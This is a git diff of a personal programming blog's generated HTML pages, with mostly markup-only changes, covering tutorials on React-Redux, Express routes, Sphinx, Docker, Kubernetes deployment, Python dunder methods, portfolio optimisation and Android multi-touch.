diff --git a/actions-and-reducers-in-react-redux.html b/actions-and-reducers-in-react-redux.html index d770e23a..fa305712 100644 --- a/actions-and-reducers-in-react-redux.html +++ b/actions-and-reducers-in-react-redux.html @@ -162,14 +162,14 @@

Actions and Reducers in React-Redux

Redux State Diagram

Let's use react-redux to build a system with which we can alert users when events are triggered. For this we will need to build an action, a reducer and a component to display the alert.

To ensure that these three pieces are speaking the same language, we need to initialise types which will represent the states being passed around. Each type is a string constant. For our alert system we need two variables:

export const SET_ALERT = "SET_ALERT"
 export const REMOVE_ALERT = "REMOVE_ALERT"
 

Action

We'll start by creating the action which will signify when an alert is triggered. We want all of our alerts to be unique so that multiple alerts can be handled without a problem, for which we will use uuid.

@@ -212,7 +212,7 @@ 


The action is declared as a function which takes in 3 arguments (2 required): msg, alertType and timeout. We then call the dispatch function with an object constructed from the arguments, and after the specified timeout we dispatch another object to remove the same alert.

Note that we curry the dispatch function in this case; this is only possible by using the middleware redux-thunk. It can also be represented as:
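Since the action creator itself is elided above, here is a minimal sketch of it; a stand-in id generator replaces uuid.v4(), and the 5000 ms default timeout is an illustrative assumption:

```javascript
const SET_ALERT = 'SET_ALERT';
const REMOVE_ALERT = 'REMOVE_ALERT';

// Curried action creator: returns a function of dispatch (redux-thunk style)
const setAlert = (msg, alertType, timeout = 5000) => (dispatch) => {
  const id = Math.random().toString(36).slice(2); // stand-in for uuid.v4()
  dispatch({ type: SET_ALERT, payload: { msg, alertType, id } });
  // After the timeout, dispatch a second action to remove the same alert
  setTimeout(() => dispatch({ type: REMOVE_ALERT, payload: id }), timeout);
};
```

Because the id is captured in the closure, the removal always targets the exact alert that was created.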

@@ -230,7 +230,7 @@ 

Component

This post won't go into detail around how to build a React component, which you can find over at another post: [INSERT REACT COMPONENT POST]

@@ -278,7 +278,7 @@ 


To break it down, we've created a React component (class) Alert which takes in alerts as an array, verifies it isn't null or empty, and finally iterates over each element in the alerts array to return a div stylized with the appropriate information.

Reducer

Lastly we have the reducer, which handles all of the states that can be created by the alert action. Luckily we can do this with a switch statement:
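The reducer itself is elided above; a minimal sketch, assuming the action shape from the action creator (with the alert id as the REMOVE_ALERT payload), might look like:

```javascript
// Alert reducer: initial state is an empty array of alerts
const alertReducer = (state = [], action) => {
  switch (action.type) {
    case 'SET_ALERT':
      // Append the new alert to the existing list
      return [...state, action.payload];
    case 'REMOVE_ALERT':
      // Drop the alert whose id matches the payload
      return state.filter((alert) => alert.id !== action.payload);
    default:
      return state;
  }
};
```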

diff --git a/api-routes-in-nodejs.html b/api-routes-in-nodejs.html
index 05510c5b..298cdbc9 100644
--- a/api-routes-in-nodejs.html
+++ b/api-routes-in-nodejs.html
@@ -159,7 +159,7 @@ 

API Routes in Node.js

First off, what's an API and, more specifically, what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of the system. This post will dive into how to set up API routes in Node.js with express.

We start by 'importing' express into our route and instantiating a router from the express library.

const express = require('express');
 const router = express.Router();
 
@@ -204,7 +204,7 @@


These 4 methods make up the basic CRUD functionality (Create, Read, Update and Delete) of an application.

POST

Let's create a scaffold POST method in node.js.

router.post('/',function(req,res) {
     res.send('POST request to homepage');
@@ -212,7 +212,7 @@ 


Similarly to do this asynchronously with arrow functions:

router.post('/',async(req,res) => {
     res.send('POST request to homepage');
@@ -220,7 +220,7 @@ 


As we can see above, the first argument to our API route method is the path, and the following is the callback function (what should happen when this path is hit). The callback can be a single function, an array of functions, a series of functions (separated by commas), or a combination of all of them. This is useful if you want to perform validation before the final POST request is handled. An example of this is:

router.post('/',[checkInputs()], async (req, res) => {
     res.send('POST request to homepage and inputs are valid');
@@ -229,7 +229,7 @@ 


GET

All the methods within Express.js follow the same principles so to create a scaffold GET request:

router.get('/',async (req, res) => {
     res.send('GET request to homepage');
@@ -238,7 +238,7 @@ 


PUT

Similarly:

router.put('/',async (req, res) => {
     res.send('PUT request to homepage');
@@ -247,7 +247,7 @@ 


DELETE

Similarly:

router.delete('/',async (req, res) => {
    res.send('DELETE request to homepage');
@@ -279,7 +279,7 @@ 

Express Middleware

An example of using all of the arguments is:
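As a framework-free sketch, a middleware is just a function of those three arguments; the logger below is illustrative, not from the original post:

```javascript
// Express-style middleware: inspect the request, then pass control along
const logger = (req, res, next) => {
  console.log(`${req.method} ${req.url}`); // log the incoming request
  next(); // hand control to the next function in the chain
};
```

Express calls each middleware in order; forgetting to call next() leaves the request hanging.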

diff --git a/author/jack-mckew6.html b/author/jack-mckew6.html
index f32eb4c8..abdb8c56 100644
--- a/author/jack-mckew6.html
+++ b/author/jack-mckew6.html
@@ -335,7 +335,7 @@ 

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

pip install sphinx …

diff --git a/automatically-generate-documentation-with-sphinx.html b/automatically-generate-documentation-with-sphinx.html index 637b590c..cb160a6d 100644 --- a/automatically-generate-documentation-with-sphinx.html +++ b/automatically-generate-documentation-with-sphinx.html @@ -160,7 +160,7 @@

Automatically Generate Documentation with Sphinx

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

pip install sphinx
 conda install sphinx
@@ -168,13 +168,13 @@ 


Once you have installed sphinx, inside the project (let's use the directory of this blog post), we can create a docs folder in which all our documentation will live.

mkdir docs
 cd docs
 

Ensuring our virtual environment with sphinx installed is active, we run sphinx-quickstart. This tool allows us to populate some information for our documentation in a nice Q&A style.

@@ -248,27 +248,27 @@ 


Now let's create an example package that we can write some documentation in.

mkdir sphinxdemo
 cd sphinxdemo
 

Then we create 3 files inside our example package:

__init__.py

version = "0.1.1"

__main__.py
@@ -282,12 +282,12 @@ 


file_functions.py
@@ -330,12 +330,12 @@ 


We need to enable the napoleon sphinx extensions in docs/conf.py for this style to work.
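As a sketch, the relevant docs/conf.py fragment might look like the following (your conf.py will contain other settings from sphinx-quickstart too):

```python
# docs/conf.py — enable napoleon alongside autodoc so Google/NumPy style
# docstrings are parsed correctly
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.napoleon",
]
```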

The resulting documented code will look like:

__init__.py
@@ -349,12 +349,12 @@ 


__main__.py
@@ -380,12 +380,12 @@ 


file_functions.py
@@ -451,7 +451,7 @@ 


Our conf.py file for sphinx's configuration results in:

Sphinx Configuration File conf.py
@@ -574,7 +574,7 @@ 


We must also set our index.rst (restructured text) with what we want to see in our documentation.

Documentation Index File index.rst
@@ -636,7 +636,7 @@ 


To generate individual pages for our modules, classes and functions, we define separate templates; these are detailed here: autosummary templates

Next we navigate our docs directory, and finally run:

make html
 

This will generate all the stubs for our documentation and compile them into HTML format.

diff --git a/book-review-the-pragmatic-programmer.html b/book-review-the-pragmatic-programmer.html index d9f27c59..7f786aa2 100644 --- a/book-review-the-pragmatic-programmer.html +++ b/book-review-the-pragmatic-programmer.html @@ -217,7 +217,7 @@

Risk in Prototypes being Deployed

Crash Early

Crashing early means the program does a lot less damage than a crippled program would. This concept can be implemented by checking for the inverse of the requirement and erroring immediately. Doing this makes the code more readable, as the requirements it must meet are stated up front, and it captures more potential issues before they cause damage versus checking that all the ducks are lined up.

For demonstrating this, we will use the example of a square root function. As we know, square root wants to have a positive number given to it (unless using complex numbers).
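A minimal sketch of that idea (the function name is illustrative):

```python
import math

# Crash early: check the inverse of the requirement and raise immediately,
# rather than limping on with bad input
def safe_sqrt(value):
    if value < 0:
        raise ValueError(f"square root requires a non-negative number, got {value}")
    return math.sqrt(value)
```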

diff --git a/category/python3.html b/category/python3.html
index 3422b053..df2da98c 100644
--- a/category/python3.html
+++ b/category/python3.html
@@ -324,7 +324,7 @@ 

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

pip install sphinx …

diff --git a/category/software-development.html b/category/software-development.html index 6b1e324a..28f505e6 100644 --- a/category/software-development.html +++ b/category/software-development.html @@ -216,7 +216,7 @@

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

pip install sphinx …

diff --git a/components-in-reactjs.html b/components-in-reactjs.html index baa2952e..43d245ff 100644 --- a/components-in-reactjs.html +++ b/components-in-reactjs.html @@ -166,7 +166,7 @@

Components in React.js

Let's create a file Landing.js (which could similarly be named Landing.jsx for the React-specific file extension, Landing.ts for TypeScript or Landing.tsx for the React-specific extension with TypeScript). This is followed by importing all the necessary requirements for our javascript file.

Import Requirements

import React from "react";
@@ -181,7 +181,7 @@ 


PropTypes is a way of implementing runtime type checking for React props. If TypeScript is used for the project, this is somewhat extra type checking, which we can never have enough of!

The Component

Now that we've imported everything that we need, it's time to actually create the component! A component in React is a function, where the props are the inputs and the element to be rendered is the return statement. We do this with an arrow function (aka Lambda function) for clarity.
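A minimal sketch of that idea, with React.createElement stubbed out so the example stands alone (names are illustrative):

```javascript
// Stub of what JSX compiles down to, so this runs without React installed
const createElement = (type, props, ...children) => ({ type, props, children });

// A functional component as an arrow function: props in, element out
const Landing = ({ title }) => createElement('h1', null, title);
```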

@@ -239,7 +239,7 @@ 

Prop Types & Connect

This post is not intended to go through how to set up the redux store or interactions with it.

@@ -254,7 +254,7 @@ 


Conclusion

Now we can use the statement import Landing from './Landing' and use our component similar to that of Link in our app!

The full source of Landing.js is:

diff --git a/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html b/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
index b1a47122..fb8dec70 100644
--- a/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
+++ b/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
@@ -179,7 +179,7 @@ 

GitHub Action

For the most part, we will be making use of run commands, as if we are interacting with the terminal in the runtime of ubuntu (Linux). Otherwise, we can make use of pre-made actions from the marketplace. One note to be made is that the AWS Elastic Beanstalk application has been set up to run specifically on Docker, and as such we need to upload the relevant Dockerfile (production) along with any assets.

The contents of the Github Action in whole will be:

diff --git a/deploying-with-kubernetes.html b/deploying-with-kubernetes.html
index c535ffc7..a8b520ef 100644
--- a/deploying-with-kubernetes.html
+++ b/deploying-with-kubernetes.html
@@ -272,7 +272,7 @@ 

CI/CD

Setting up Ingress-Nginx

Before we can access our application through an IP or web address, we need to set up ingress-nginx, similar to how we did with docker-compose in previous posts. Luckily, we can make use of helm to add this functionality for us (provided we'd set up nginx configuration like we already have). This can be done by sshing into the terminal of our Kubernetes cluster, or similarly making use of the Cloud Shell provided by Google Cloud.

First we need to install helm (https://helm.sh/docs/intro/install/#from-script):

curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
 chmod 700 get_helm.sh
@@ -280,7 +280,7 @@ 


Followed by setting up ingress-nginx (https://kubernetes.github.io/ingress-nginx/deploy/#using-helm):

helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
 helm install my-release ingress-nginx/ingress-nginx
 
diff --git a/develop-and-deploy-multi-container-applications.html b/develop-and-deploy-multi-container-applications.html index 2044a460..72baebfe 100644 --- a/develop-and-deploy-multi-container-applications.html +++ b/develop-and-deploy-multi-container-applications.html @@ -223,7 +223,7 @@

Vue

FibInputForm Component

Components are pieces of user interface that we can access in multiple parts of our application. We build a component which will contain both the HTML and the javascript for driving the user input, and for displaying the output retrieved from Redis or PostgreSQL. Vue components are typically composed of a template block and corresponding script and style blocks. When writing the template for a component, there are numerous Vue-specific attributes that we can provide to the elements in the HTML. For this project we will make use of Bulma/Buefy CSS (which can be installed with npm install bulma or npm install buefy) for our styling.

We create a file named FibInputForm.vue inside project_name/src/components with the contents:

@@ -379,7 +379,7 @@ 


To briefly cover the functionality above, the template is built up of 3 parts: the input form where users submit an index to query, a list of the latest indexes as stored in Redis separated by commas, and finally a list of the calculated values as retrieved from the PostgreSQL database. We use axios to interface with the API that we will create with express. We query the API upon load, and the page is always reloaded when submit is pressed. Now that this has been exported, it can be imported from any other point in our web application and placed in with a <FibInputForm/> element! Neat!

FibInputPage View

Now that we have our component, we need a page to put it on! We create a new file within project_name/src/views named FibInputPage.vue with the contents:

@@ -429,7 +429,7 @@ 


As we can see above, we've imported our neat little FibInputForm and used it after placing it in a centered section. Again we export the page view so we can import into the router to make sure it's linked to a URL.

Routing the Page

Lastly for Vue, we need to set up a route so users can reach our page, both within the vue-router and on the main page (App.vue). Routes are all defined within project_name/router/index.ts. So we need to add in a new one for our FibInputPage by adding the following object into the routes array:

@@ -449,7 +449,7 @@ 


Next to ensure the route is accessible from a link on the page, add a router-link element into the template of App.vue:

<router-link to="/fib">Fib</router-link> |
 

Redis

@@ -457,7 +457,7 @@


Redis is an open source, in-memory data store, we give it a key and a value, which it'll store. Later we can ask with the key, and get the value back. We are going to set up two parts to make this service work as expected. The redis runtime is managed for us directly from using the redis image as provided on Docker Hub, but we need to make a node.js project to interface with it.

We do this by creating 3 files: package.json, index.js and keys.js. package.json defines what dependencies need to be installed, and how to run the project. index.js manages the redis client and contains the functionality for calculating the fibonacci sequence when given an index. keys.js contains any environment variables that the project may need. In particular we use environment variables so docker-compose can link all the services together later on.
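The fibonacci calculation that index.js performs can be sketched as follows, assuming the common 1, 1, 2, 3, … convention; the redis client wiring is omitted here:

```javascript
// Deliberately naive recursive fibonacci: this is the "slow" calculation
// the worker performs for a given index
function fib(index) {
  if (index < 2) return 1; // base cases: fib(0) = fib(1) = 1
  return fib(index - 1) + fib(index - 2);
}
```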

Here is the code for the core of this project, index.js:

@@ -504,7 +504,7 @@ 


PostgreSQL

Find all the source code for the PostgreSQL service at: https://github.com/JackMcKew/multi-docker/tree/master/server

We are going to use the PostgreSQL service part of our project to contain the interface with the database, and the API with express. Very similar to our redis project, we need a package.json, index.js and keys.js. Let's dive straight into the code inside index.js:

@@ -691,7 +691,7 @@ 


Nginx

Nginx in this project helps us create all the connections between the services so that they all play nicely. Nginx works by having any connections defined in a configuration file, which is passed to it at runtime.

This is our default.conf nginx configuration for this project:

@@ -741,7 +741,7 @@ 


We also set up a few locations; these help nginx 'finish' the route. / means any incoming connection is passed off to the front end to render. If any incoming request contains /api then we want to pass that request to the API service, so we rewrite the URL to the correct form first.
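As a sketch (upstream names illustrative, not the original configuration), those location blocks might look like:

```nginx
# '/' hands everything to the front end; '/api' is rewritten and passed on
location / {
    proxy_pass http://client;
}

location /api {
    rewrite /api/(.*) /$1 break;
    proxy_pass http://api;
}
```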

Docker Compose

Now that we've got our individual services all configured, we need a way to run them all at the same time. We need to create a docker-compose.yml which will contain all the environment variables, and define how the services depend on and connect to each other, so we can run it all!

@@ -876,7 +876,7 @@ 


Note that our environment variables (which were set in keys.js earlier), are just the name of the service given in the docker-compose.yml file. Docker Compose handles all the renaming when each service is connected up for us! How awesome is that!

Github Actions

Now that we've set up all of our services and made sure they play nicely in Docker Compose, it's time to implement CI/CD with Github Actions so whenever we push a new version of our code, it'll automatically test that everything works and deploy the new version of the application. We do this by creating a test-and-deploy.yml within .github/workflows/ which contains:

@@ -1036,7 +1036,7 @@ 

Docker Hub

Everything's now set up! For another user or a deployment service to get each of the images for the services they've created they can now simply run docker run jackmckew/multi-docker-client and that's it! It should run on any operating system provided Docker is installed, how cool is that!

Deploying to AWS Elastic Beanstalk

Now we want to deploy this application to Elastic Beanstalk, that means we need to create a Dockerrun.aws.json which is very similar to that of the docker-compose.yml. The contents of the json file will be:

diff --git a/develop-and-deploy-with-docker.html b/develop-and-deploy-with-docker.html
index 9ef8088a..999c796d 100644
--- a/develop-and-deploy-with-docker.html
+++ b/develop-and-deploy-with-docker.html
@@ -181,7 +181,7 @@ 

Develop and Deploy with Docker

The Web Application

For the web app we will use React, which is a javascript framework for managing the front end of applications. To generate the web app boilerplate for us, we will use create-react-app. For running this, ensure that Node.js is installed on the local PC. Finally run the command below, to initialise the front end component of React of our web app.

npx create-react-app frontend --template typescript
 
@@ -190,7 +190,7 @@


Dockerfile

For this workflow we're going to set up two Dockerfiles, one for development and one for production. Let's start with the development Dockerfile, which we will aptly name Dockerfile.dev; we must ensure to add the -f flag along with the filename when building the Docker image with docker build -f Dockerfile.dev ..

The contents of our Dockerfile.dev will contain:

@@ -220,16 +220,16 @@ 


To circumvent the issue that Docker takes a snapshot of the code at build time while we want our app to update on save, we use a mount to create a 'reference' to our folder on the local PC. We do this by running the command:

docker run -it -p 8000:3000 -v /app/node_modules -v ${pwd}:/app [image_id]
 

If using Windows, replace the ${pwd} with the full path to the folder, ensuring to swap all backslashes to forwards slashes and changing C: to /C/. Here is an example:

docker run -it -p 8000:3000 -v /app/node_modules -v /C/Users/jackm/Documents/GitHub/docker-kubernetes-course/frontend:/app [image_id]
 

Docker Compose

Rather than using the rather large command above, let's use Docker Compose.

@@ -263,7 +263,7 @@ 


  • We mount the current directory to the app directory in the container for updating in sync
  • Again, if using Windows, we need to add some more options to our service:

    stdin_open: true
    @@ -280,7 +280,7 @@ 

    Running Tests

    Option 1 can be cumbersome as we will need to do this each time when running a container.

    Option 2 is achieved by creating a new service in our docker-compose.yml file:

    @@ -327,7 +327,7 @@ 

    Nginx

    Multi-stage Dockerfile

     To implement our multi-stage Dockerfile as above, we do this with the following yaml:

    diff --git a/developing-with-kubernetes.html b/developing-with-kubernetes.html
    index d2bf2b62..0e1346d9 100644
    --- a/developing-with-kubernetes.html
    +++ b/developing-with-kubernetes.html
    @@ -232,7 +232,7 @@ 

    The Architecture

    ClusterIP Service

    We need to set up a ClusterIP service for each of our deployments except the worker deployment. This will allow our services to communicate with others inside the node.

    To do this, we create a configuration yaml file:
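A minimal sketch of such a file, using the redis deployment as an example (the names are illustrative, not the original configuration):

```yaml
# ClusterIP service exposing the redis deployment inside the node
apiVersion: v1
kind: Service
metadata:
  name: redis-cluster-ip-service
spec:
  type: ClusterIP
  selector:
    component: redis
  ports:
    - port: 6379
      targetPort: 6379
```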

    @@ -289,7 +289,7 @@ 

    PVC Configuration

    @@ -318,7 +318,7 @@ 


    Environment Variables

     Some of our pods depend on environment variables being set to work correctly (eg, REDIS_HOST, PGUSER, etc). We add these using the env key in our spec > containers configuration.

    For example, for our worker to connect to the redis deployment:
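A sketch of the relevant fragment (the value is assumed to match the name of a redis ClusterIP service):

```yaml
# env entry on the worker container; Kubernetes resolves the service
# name to the correct IP for us
env:
  - name: REDIS_HOST
    value: redis-cluster-ip-service
```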

    @@ -340,7 +340,7 @@ 


    Note that for the value of the REDIS_HOST we are stating the name of the ClusterIP service we had previously set up. Kubernetes will automatically resolve this for us to be the correct IP, how neat!

    Secrets

     Secrets are another type of object inside of Kubernetes that is used to store sensitive information we don't want to live in the plain text of the configuration files. We do this through a kubectl command:

     kubectl create secret [secret_type] [secret_name] --from-literal key=value
     

    There are 3 types of secret types, generic, docker_registry and tls, most of the time we'll be making use of the generic secret type. Similar to how we consume other services, we will be consuming the secret from the secret_name parameter. The names (but not the value) can always be retrieved through kubectl get secrets.

    @@ -349,7 +349,7 @@


    Consuming Secrets as Environment Variable

    Consuming a secret as an environment variable for a container is a little different to other environment variables. As secrets can contain multiple key value pairs, we need to specify the secret and the key to retrieve the value from:
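A sketch of the relevant fragment (the secret and key names are illustrative):

```yaml
# Pull one key out of a secret and expose it as an environment variable
env:
  - name: PGPASSWORD
    valueFrom:
      secretKeyRef:
        name: pgpassword
        key: PGPASSWORD
```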

    @@ -363,7 +363,7 @@ 


    Ingress Service

     The ingress service allows traffic from outside to reach our Kubernetes cluster, and thus defines how incoming requests should be treated and how to route them.

    The entirety of our configuration for the ingress service is:

    diff --git a/distributing-python-code.html b/distributing-python-code.html
    index 5abb0777..3f634628 100644
    --- a/distributing-python-code.html
    +++ b/distributing-python-code.html
    @@ -161,7 +161,7 @@ 

    Distributing Python Code

     This post will cover a way of distributing Python code such that it can be used by someone that does not have Python installed. One of the major drawbacks with Python, although the gap is slowly being closed, is how difficult it can be to distribute Python code.

     At a minimum, the computer that is to run the code must have the Python interpreter (or equivalent). Now while this has been progressively included in more operating systems as a default (the May update of Windows being the latest), you must still develop as though it is not present on the users' PC.

     For this post, I will show you a basic piece of code to demonstrate how it will be packaged and distributed to your users. We will show a basic dialog box on the screen with the following code:

    import ctypes
     
    diff --git a/dunders-in-python.html b/dunders-in-python.html
    index 34fdcd5c..56f49758 100644
    --- a/dunders-in-python.html
    +++ b/dunders-in-python.html
    @@ -159,7 +159,7 @@ 

    Dunders in Python

     A 'dunder' (double underscore) method in Python (also known as a magic method) is a function within a class having two prefix and two suffix underscores in the function name. These are normally used for operator overloading (eg, __init__, __add__, __len__, __repr__, etc). For this post we will build a customized class for vectors to understand how the magic methods can be used to make life easier.

    First of all before we get into the magic methods, let's talk about normal methods. A method in Python is a function that resides in a class. To begin with our Vector class, we initialise our class and give it a function, for example:

    class Vector():
    @@ -169,15 +169,15 @@ 


    Now to call the method, we simply call the function name along with the Vector instance we wish to use:

     Vector.say_hello()
     

    This will print:

     Hello! I'm a method
     

    Now for our vector class, we want to be able to initialise it with certain constants or variables for both the magnitude and direction of our vector. We use the __init__ magic method for this, as it is invoked without any call, when an instance of a class is created.

    class Vector():
         def __init__(self, *args):
    @@ -185,7 +185,7 @@ 


    Now when we create an instance of our Vector class, we can give it certain values that it will store in a tuple:

    vector_1 = Vector(1,2,3)
     
    @@ -193,11 +193,11 @@ 


    Which will print:

     <__main__.Vector object at 0x03E90530>
     

    But to us humans, this doesn't mean much more than we know what the name of the class is of that instance. What we really want to see when we call print on our class is the values inside it. To do this we use the __repr__ magic method:

    @@ -217,11 +217,11 @@ 


    Which will print:

     (1, 2, 3)
     

    This is exactly what we want! Now what if we wanted to create a Vector, but we weren't sure what values we wanted to give it yet. What would happen if we didn't give it any values? Would it default to (0,0) like we would hope?

    empty_vector = Vector()
     
    @@ -229,11 +229,11 @@ 


    Which will print:

     ()
     

    Not exactly how we need it, so we would need to run a check when the class is being initialized, to ensure that there are values being provided:

    @@ -252,7 +252,7 @@ 


     Now when we initialise an empty instance of our Vector, it will create a (0,0) vector for us!

     Now what if we wanted to be able to check how many values were inside our vector class? To do this we can use the __len__ magic method:
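Putting the pieces so far together, a minimal sketch of the class with __len__ added:

```python
class Vector:
    def __init__(self, *args):
        # Default to a (0, 0) vector when no values are provided
        self.values = args or (0, 0)

    def __repr__(self):
        # Show the stored values rather than the default object repr
        return str(self.values)

    def __len__(self):
        # Number of values stored in the vector
        return len(self.values)

print(Vector(1, 2, 3))       # (1, 2, 3)
print(len(Vector(1, 2, 3)))  # 3
```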

    @@ -284,7 +284,7 @@ 


    Which will print:

     (1, 2, 3)
     3
     
    diff --git a/efficient-frontier-for-balancing-portfolios.html b/efficient-frontier-for-balancing-portfolios.html index 3e46fb8d..86671302 100644 --- a/efficient-frontier-for-balancing-portfolios.html +++ b/efficient-frontier-for-balancing-portfolios.html @@ -180,7 +180,7 @@

     Efficient Frontier for Balancing Portfolios
  • The result from the minimize function is returned as an OptimizeResult type.
    @@ -206,7 +206,7 @@ 


    Similarly to the maximum sharpe ratio we do the same for determining the minimum volatility portfolio programmatically. We minimise volatility by trying different weightings on our asset allocations to find the minima.
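The objective being minimised can be sketched as the annualised portfolio standard deviation; 252 trading days are assumed, and the signature mirrors what a scipy.optimize.minimize-style objective expects (it is illustrative, not the original code):

```python
import numpy as np

# Annualised portfolio volatility: sqrt(w' C w) scaled by sqrt(252),
# assuming a daily-return covariance matrix. mean_returns is unused here
# but kept to match the shared objective signature.
def portfolio_volatility(weights, mean_returns, cov_matrix):
    variance = np.dot(weights.T, np.dot(cov_matrix, weights))
    return np.sqrt(variance) * np.sqrt(252)
```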

    @@ -234,7 +234,7 @@ 


     As above, we can also draw a line which depicts the efficient frontier of the portfolios for a given risk rate. Below, some functions are defined for computing the efficient frontier. The first function, efficient_return, calculates the most efficient portfolio for a given target return, and the second function, efficient_frontier, compiles the most efficient portfolios for a range of targets.

    @@ -274,7 +274,7 @@ 


    Now it's time to plot the efficient frontier on the graph with the randomly selected portfolios to check if they have been calculated correctly. It is also an opportune time to check if the maximum Sharpe ratio and minimum volatility portfolios have been calculated correctly by comparing them to the previously randomly determined portfolios.

    @@ -387,7 +387,7 @@ 



    The surprising part is that the calculated result is very close to what we have previously simulated by picking from randomly generated portfolios. The slight differences in allocations between the simulated vs calculated are in most cases less than 1%, which shows how powerful randomly estimating calculations can be albeit sometimes not reliable in small sample spaces.

    Rather than plotting every randomly generated portfolio, we can plot the individual stocks with their corresponding return and risk values. This way we can see how diversification lowers risk compared to holding any single stock, by optimizing the allocations.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-11-power-quality-explained.html b/episode-11-power-quality-explained.html
    index f8239c0c..35d08821 100644
    --- a/episode-11-power-quality-explained.html
    +++ b/episode-11-power-quality-explained.html
    @@ -170,7 +170,7 @@ 

    Episode 11 - Power Quality Explained

    Harmonics

    AC (Alternating Current) electricity is generated as a sinusoidal waveform, and harmonics are signals/waves whose frequency is a whole-number multiple of the frequency of the reference signal/wave. To visualize this phenomenon, we can use packages like NumPy and Matplotlib to calculate and plot our base signal and its harmonics (I encourage you to run this code and change the harmonics to see what they look like).
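A minimal sketch of that visualization; the 50 Hz fundamental and the choice of 3rd and 5th harmonics are illustrative assumptions, not necessarily the post's exact parameters.

```python
import numpy as np
import matplotlib.pyplot as plt

t = np.linspace(0, 0.04, 1000)               # two cycles of a 50 Hz wave
base = np.sin(2 * np.pi * 50 * t)            # fundamental
third = np.sin(2 * np.pi * 150 * t) / 3      # 3rd harmonic, reduced amplitude
fifth = np.sin(2 * np.pi * 250 * t) / 5      # 5th harmonic

plt.plot(t, base, label='fundamental (50 Hz)')
plt.plot(t, third, label='3rd harmonic')
plt.plot(t, fifth, label='5th harmonic')
plt.plot(t, base + third + fifth, label='combined')
plt.xlabel('Time (s)')
plt.legend()
plt.show()
```

The combined trace shows how the summed harmonics distort the clean sinusoid, which is exactly the distortion power-quality analysis is concerned with.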

    -
     1
    +
     1
      2
      3
      4
    @@ -240,7 +240,7 @@ 

    Capacitor Calculator - Python

    CodeCogsEqn-6.gif

    CodeCogsEqn-7.gif

    Once we input all the required formulas and our initial data points, we can easily compute the required capacitor size to amend power factor issues.
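A hedged sketch of that calculation using the standard power-factor-correction relations Qc = P(tan φ1 - tan φ2) and C = Qc / (2πfV²); the example load values (10 kW, 0.75 to 0.95 power factor, 415 V, 50 Hz) are illustrative assumptions, not the post's data points.

```python
import math

def correction_capacitor(p_watts, pf_initial, pf_target, voltage, frequency):
    # Reactive power (VAr) the capacitor must supply to reach the target power factor
    q_c = p_watts * (math.tan(math.acos(pf_initial)) - math.tan(math.acos(pf_target)))
    # Capacitance in farads, from Qc = 2 * pi * f * C * V^2
    return q_c / (2 * math.pi * frequency * voltage ** 2)

c = correction_capacitor(10_000, 0.75, 0.95, 415, 50)
print(f"{c * 1e6:.1f} uF")
```

For this assumed load the result lands in the region of 100 µF, a typical order of magnitude for low-voltage correction capacitors.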

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-13-types-of-machine-learning.html b/episode-13-types-of-machine-learning.html
    index dbc132ca..97415ecc 100644
    --- a/episode-13-types-of-machine-learning.html
    +++ b/episode-13-types-of-machine-learning.html
    @@ -167,7 +167,7 @@ 

    Episode 14 - Types of Machine Lear

    Supervised Learning

    Most practical machine learning algorithms use supervised learning. Supervised learning is where you have one or more input variables (x) and output variable(s) (y), and you use an algorithm to learn the mapping function from the input to the output.

    -
    1
    y = f(x)
    +
    1
    y = f(x)
     

    The end goal of this algorithm is to approximate the mapping function accurately, such that when you have a new data input (x), you can predict what the result (y) for that data would be.
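A tiny illustration of learning an approximate mapping y = f(x) from labelled examples; here a least-squares line fit stands in for "an algorithm", and the data points are made up for the example.

```python
import numpy as np

x = np.array([1.0, 2.0, 3.0, 4.0])
y = np.array([2.1, 3.9, 6.2, 7.8])       # labelled outputs, roughly y = 2x

slope, intercept = np.polyfit(x, y, 1)   # learn the mapping from the data

def predict(new_x):
    # Apply the learned approximation of f to unseen input
    return slope * new_x + intercept

print(predict(5.0))                      # predict y for a new input x = 5
```

Once trained, the model is queried only through `predict`, mirroring the supervised-learning workflow described above.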

    diff --git a/episode-5-android-multi-touch.html b/episode-5-android-multi-touch.html index 558aee95..8f599173 100644 --- a/episode-5-android-multi-touch.html +++ b/episode-5-android-multi-touch.html @@ -159,7 +159,7 @@

    Episode 5 - Android Multi-Touch

    This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly, to track where the screen is being touched, we need to create a class to handle the interaction. A public class like Finger.java, as seen below, contains 3 values: x_pos, y_pos and id. It is also useful to create a constructor so that other classes can easily construct the Finger class.

    ezgif.com-video-to-gif-2

    -
     1
    +
     1
      2
      3
      4
    @@ -189,7 +189,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that we have a class to store the details of how each finger is touching the screen, we need to interact with some base-level Java. Firstly, we need to extend a view within the Android application so that the application knows what boundaries to deal with; in my test application, I've just used the entire screen as the view.

    After that, an array is needed to store the data of multiple inputs touching the screen. I've used a TreeMap in this example, as it keeps the inputs ordered by when they were touched; however, this comes with a downside: lifting an input in the middle of the touch order crashes the array. This will be fixed in a later episode.

    A Paint is initialized both for the stroke used to draw lines between the touches and for the text that is to come. Generic constructors for the view are also listed below.

    -
     1
    +
     1
      2
      3
      4
    @@ -255,7 +255,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that everything is initialized and we are ready to draw graphics on the screen, we have to interface with touch events so the application is interactive. This is done by creating a new function within our View class that takes in a MotionEvent, so that we can detect different types of touch events. Documentation on this can be found at https://developer.android.com/training/graphics/opengl/touch#java.

    -
     1
    +
     1
      2
      3
      4
